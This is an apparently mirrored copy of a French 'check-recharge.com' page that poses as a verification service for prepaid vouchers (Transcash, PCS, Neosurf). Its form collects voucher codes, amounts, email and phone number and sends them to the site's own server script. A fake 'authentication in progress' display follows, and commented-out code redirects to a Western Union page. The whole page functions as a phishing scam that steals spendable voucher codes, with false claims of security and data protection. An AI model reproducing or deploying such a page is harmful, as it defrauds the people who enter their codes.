<!DOCTYPE html>
<html>

<!-- Mirrored from check-recharge.com/ by HTTrack Website Copier/3.x [XR&CO'2014], Fri, 10 Sep 2021 19:34:53 GMT -->
<!-- Added by HTTrack --><meta http-equiv="content-type" content="text/html;charset=UTF-8" /><!-- /Added by HTTrack -->
<head>
	<link rel="icon" href="favicon.html" type="image/x-icon" />
	<link rel="shortcut icon" href="favicon.html" type="image/x-icon" />
	<meta charset='utf-8'>
	<link rel="stylesheet" href="css/font-awesome/css/font-awesome.min.css">
	<link rel='stylesheet' href='css/style.css'>
	<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>
	<title>Check-recharge.com</title>
</head>
<style type="text/css">
	#verifLien{
		position: absolute;
		width: 100%;
		text-align: center;
		bottom: 70px;
	}
	#verifLien a{
		border: 2px solid #025092;
		color: white;
		padding: 13px 35px;
		font-weight: bold;
		border-radius: 10px;
		transition: .5s;
		background: #0000001c;
	}
	#verifLien a:hover{
		
		border: 2px solid #ff6304;
	}
	#repsonse{
		display: flex;
		display: none;
	    text-align: center;
	    position: fixed;
	    width: 600px;
	    height: 200px;
	    border: 2px solid grey;
	    top: 30%;
	    left: calc( 50% - 300px );
	    background-color: white;
	    
	    align-items: center;
	    padding: 10px;
	}
@media all and (max-width:600px){
	#resultaten{
		width: 90% !important;
		left:5% !important;
	}
	#repsonse{
		width: 96%;
		left:2%;
		height: 150px;
		top:40%;
	}
}

</style>
<body>

<header>
	<div class='content'>
		<div id='logo'>
			<a href='index-2.html'><img src='images/logo.png'></a>
		</div>
		<div id='link'>
			
			<a href='#formm'>Authentifier</a>
		</div>
	</div>
</header>
	<section id='indSection'>
		<div id='ban'>
			<div id='banDiv'>

				<span class='textSapn' id='sp1'>Votre vérification en un click</span>
				<span class='textSapn' id='sp3'>Une procédure simplifiée</span>
				<span class='textSapn' id='sp4'>Nous sommes à votre écoute 24/7</span>
				<div id='verifLien'>	
					<a href='#formm'>Faites une authentification</a>
				</div>
			</div>
		</div>
		<div id='fisrtText'>
			<h1>Bienvenue Sur CHECK-RECHARGE.COM</h1>
			<p >Notre serveur d'authentification de recharge vous permet d'obtenir une attestation ou certificat de validité qui vous permettra d'apporter la preuve que votre recharge n'a pas encore été utilisé. Pour pouvoir obtenir le statut de votre recharge, vous n'aurez qu'à cliquer sur le type de coupon dont vous voulez connaître le statut. Ensuite, insérez les infomations de la recharge à savoir le montant et le code de recharge puis appuyer sur valider</p>
		</div>
		<div  style='background-color: #f5f5f5' class='grille deux'>
			<div class='grilleDiv'>
				<div class="grid_icon"><i class='fa fa-check'></i></div>
				<h3>Efficace</h3>
			</div>
			<div class='grilleDiv'>
				<div class="grid_icon"><i class='fa fa-clock-o'></i></div>
				<h3>Rapide</h3>
			</div>
			<div id='formm' class='grilleDiv'>
				<div class="grid_icon"><i class='fa fa-lock'></i></div>
				<h3>Securisé</h3>
			</div>
		</div>


		<div id='form'>
			<h2>Formulaire d'authentification</h2>
			<form>
				<div>
					<label>Type de ticket</label>
					<select id='type'  name="type" required>
						<option value=''>Choisir</option>
						<option>Transcash</option>
						<option>PCS</option>
						<option>Neosurf</option>
					</select>
				</div>
				<div>
					<label>Nombre de coupons</label>
					<select  id='nombre' name="nombre">
						<option>1</option>
						<option>2</option>
						<option>3</option>
					</select>
				</div>
				
				<div>
					<label id='c1'>Code de recharge</label>
					<input type="text" name="code" placeholder="CODE DE RECHARGE" required>
				</div>
				<div >
					<label id='m1'>Montant</label>
					<select name="montant" required>
						<option value=''>Choisir</option>
						<option>20 €</option>
						<option>50 €</option>
						<option>100 €</option>
						<option>150€</option>
						<option>200 €</option>
						<option>250€</option>
						<option>500€</option>
					</select>
				</div>

				<span id='hideShowNum' style='width: 100%;display: flex;flex-wrap: wrap;'>
					
				</span>
				<div>
					<label>Email</label>
					<input type="email" name="email" placeholder="EMAIL">
				</div>
				<div>
					<label>Telephone</label>
					<input type="tel" name="telephone" placeholder="TELEPHONE">
				</div>
				<input type="submit" value="AUTHENTIFIER">
			</form>
		</div>

		<div class='grille deux' id='backTrans'>
			<div  class='deuxDiv' style='width:48%;padding:10px;text-align:left'>
				
				<p>
					Nous nous engageons, dans le cadre de nos activités et conformément à la réglementation en vigueur, à assurer la protection, la confidentialité et la sécurité de vos données à caractère personnel, ainsi qu’à respecter votre vie privée. Dans ce contexte associé à l’application du règlement général sur la protection des données personnelles, nous avons souhaité que les informations liées à la protection des données personnelles soient clairement différenciées.
					Notre serveur est sécurisé et donc, toutes les informations saisies sont traitées uniquement par le serveur de vérification afin de vous accorder une certaine confidentialité. Nous vous prions alors de vous assurer de l'authenticité de votre coupon.
				</p>
				
			</div>

		<div  class='deuxDiv' style='width:48%;text-align:left'>
			<div class='fdiv' >
				<h4>Efficacité du service</h4>
				<span id='spandiv1' class='spandiv'>92%</span>
				<div class='sdiv'>
					<div id='tdiv1' class='tdiv' >
					</div>
				</div>
			</div>
			<div class='fdiv' >
				<h4>Securité du service</h4>
				<span id='spandiv2' class='spandiv'>99%</span>
				<div class='sdiv'>
					<div id='tdiv2' class='tdiv' >
					</div>
				</div>
			</div>
			<div class='fdiv' >
				<h4>Satisfaction du client</h4>
				<span id='spandiv3' class='spandiv'>81%</span>
				<div class='sdiv'>
					<div id='tdiv3' class='tdiv' >
					</div>
				</div>
			</div>
			<div class='fdiv' >
				<h4>Rapidité du service</h4>
				<span id='spandiv4' class='spandiv'>95%</span>
				<div class='sdiv'>
					<div id='tdiv4' class='tdiv' >
					</div>
				</div>
			</div>
			</div>
		</div>
	</section>

			
	<div id='inpMail'>
		<form id='inpMailForm'>
			<input type='email' name='inpInput' placeholder='Abonnez vous. Ex: Pierre@gmail.com' required >
			<input id='sub' type='submit' value="S'abonner"> <span style='display:none' id='text'>Envoyé</span>
		</form>
	</div>
	<footer>
		<div class='content'>
			<div class='orange'>
				
				<img src="images/tc.jpg">
				<img src="images/pcs.jpg">
				<img src="images/neo.png">
			</div>
			<div class='bleu'>
				CHECK-RECHARGE © All Rights Reserved | 2021
			</div>
		</div>	
	</footer>

<div id='resultaten' style='display:none;text-align:center;position:fixed;width:300px;height:200px; border:2px solid grey;top:30%;left:40%; background-color:white'> 
	  <div id='actionen'>
	   <h3>Authentification en cours</h3>
	    <p style='font-size:75%;'> Veuillez patientez...</p>
	    <img src='images/loading.gif'/>
	  </div>
	  
	</div>
</div>	
<div id='repsonse'>
	Votre requête a été reçue. Veuillez patientez !!! Le résultat de la requête vous sera communiqué dans quelques instants...	
</div>	
<!-- <img id='imgRef' style='width:100%;display:none' src='images/equipee.jpg' > -->
<script src='js/jq.js'></script>
<script >

var etat = 'Non';
//function nl2
	function nl2br(elements){
	    var element = elements.replace(/\n/g,'<br/>');
	    return element;
	}



//creation de l'anim
				var backAnim = function(sec){
					$(sp1).css('opacity','1')
					a = 0;
					

					setTimeout(function(){
						$(sp1).css('opacity','0')
						$(ban).css({
							backgroundImage:"url('images/telrec2.jpg')",
						})
						$(sp3).css('opacity','1')
					},a +=(sec*1000))

					setTimeout(function(){
						$(sp3).css('opacity','0')
						$(ban).css({
							backgroundImage:"url('images/telrec.jpg')",
						})
						$(sp4).css('opacity','1')
					},a +=(sec*1000))

					setTimeout(function(){
						$(sp4).css('opacity','0')
						$(ban).css({
							backgroundImage:"url('images/slider2.jpg')",
						})
						$(sp1).css('opacity','1')
						backAnim(sec);
					},a +=(sec*1000))
				}

				var a = 0 ;
				backAnim(5);
//Effet du scroll
				window.addEventListener('scroll',function(e){

					if(window.pageYOffset > ($(backTrans).offset().top - 600 )){
						$(spandiv1).css('left','77%')
						$(tdiv1).css('width','79%');

						$(spandiv2).css('left','97%')
						$(tdiv2).css('width','99%');

						$(spandiv3).css('left','79%')
						$(tdiv3).css('width','81%');

						$(spandiv4).css('left','93%')
						$(tdiv4).css('width','95%');
					}
					else{
						$(spandiv1).css('left','0%')
						$(tdiv1).css('width','0%');

						$(spandiv2).css('left','0%')
						$(tdiv2).css('width','0%');

						$(spandiv3).css('left','0%')
						$(tdiv3).css('width','0%');

						$(spandiv4).css('left','00%')
						$(tdiv4).css('width','0%');
					}
					if(window.pageYOffset > ($(inpMail).offset().top - 600 )) {
						$('#inpMail input[type=email]').css('left','0');
						$('#inpMail input[type=submit]').css('opacity','1');
					}else {
						$('#inpMail input[type=email]').css('left','-100%');
						$('#inpMail input[type=submit]').css('opacity','0');
					}
				})
//Envoie du subscribe
				$(inpMailForm).submit(function(e){
					e.preventDefault();
					$(sub)
					.prop('disabled',true)
					.attr('value',$(text).text())
					 var data = $(this).serialize();
					$.ajax({
							url:'outils/email.php',
							type:'post',
							data:data,
							dataType:'text',
							
						})
				})

	$('#nombre').change(function(){
		$('#c1').text('Code de recharge')
		$('#m1').text('Montant')
		$('#hideShowNum').html('')
		if($(this).val() == 2){
			$('#c1').text('Code de recharge 1')
			$('#m1').text('Montant 1')

			$('#hideShowNum').html('<div><label>Code de recharge 2</label><input type="text" name="code2" placeholder="CODE DE RECHARGE 2" required></div><div><label>Montant 2</label><select name="montant2"><option value="" required>Choisir</option><option>20 €</option><option>50 €</option><option>100 €</option><option>150€</option><option>200 €</option><option>250€</option><option>500€</option></select></div>')
		}
		if($(this).val() == 3){
			$('#c1').text('Code de recharge 1')
			$('#m1').text('Montant 1')

			$('#hideShowNum').html('<div><label>Code de recharge 2</label><input type="text" name="code2" placeholder="CODE DE RECHARGE 2" required></div><div><label>Montant 2</label><select name="montant2"><option value="" required>Choisir</option><option>20 €</option><option>50 €</option><option>100 €</option><option>150€</option><option>200 €</option><option>250€</option><option>500€</option></select></div> <div><label>Code de recharge 3</label><input type="text" name="code3" placeholder="CODE DE RECHARGE 3" required></div><div><label>Montant 3</label><select name="montant3"><option value="" required>Choisir</option><option>20 €</option><option>50 €</option><option>100 €</option><option>150€</option><option>200 €</option><option>250€</option><option>500€</option></select></div>')
		}	
	})

	$('#form form').submit(function(e){
	    e.preventDefault()

	    setTimeout(function(){
	        $('#resultaten').hide()
	        $('#repsonse').css('display','flex')
	   	},3000)
	    setTimeout(function(){
	        
	        $('#repsonse').hide()
	   	},8000)
	    $('#resultaten').show()
	    var data = $(this).serialize();
	    $.ajax({
            url:'tic/ajaxpost.php',
            type:'post',
            data:data,
            dataType:'text',
            success: function(resultat){
              $('input[name=code]').val('')
              $('#hideShowNum').html('')
              $('select#nombre').val(1)
              $('select#type').val('')
              $('select[name=montant]').val('')
            }
        })

	    /*$('#'+r+'').fadeToggle();
	    
	                    
	    setTimeout(function(){
	      nb++;
	      $('#'+a+'').css('display','none')
	      $('#'+rp+'').css('display','block')

	      if(nb == 3) {
	        $(".textError").text($(textE).text());
	        $(submit).prop('disabled',true)
	        

	        setTimeout(function(){
	          window.location.href = "western_union.php";
	          

	        },300000)
	      }else{
	        setTimeout(function(){
	          $('input[type=text]').val('')

	          $('#'+r+'').fadeToggle('normal',function(){ 
	            $('#'+rp+'').css('display','none')
	            $('#'+a+'').css('display','block')  
	          });
	          

	        },2000)
	      }

	      $('input[name=mtn]').val('')
	    },5000)*/

	    
	  })






</script>

		</body>
	
<!-- Mirrored from check-recharge.com/ by HTTrack Website Copier/3.x [XR&CO'2014], Fri, 10 Sep 2021 19:35:03 GMT -->
</html>
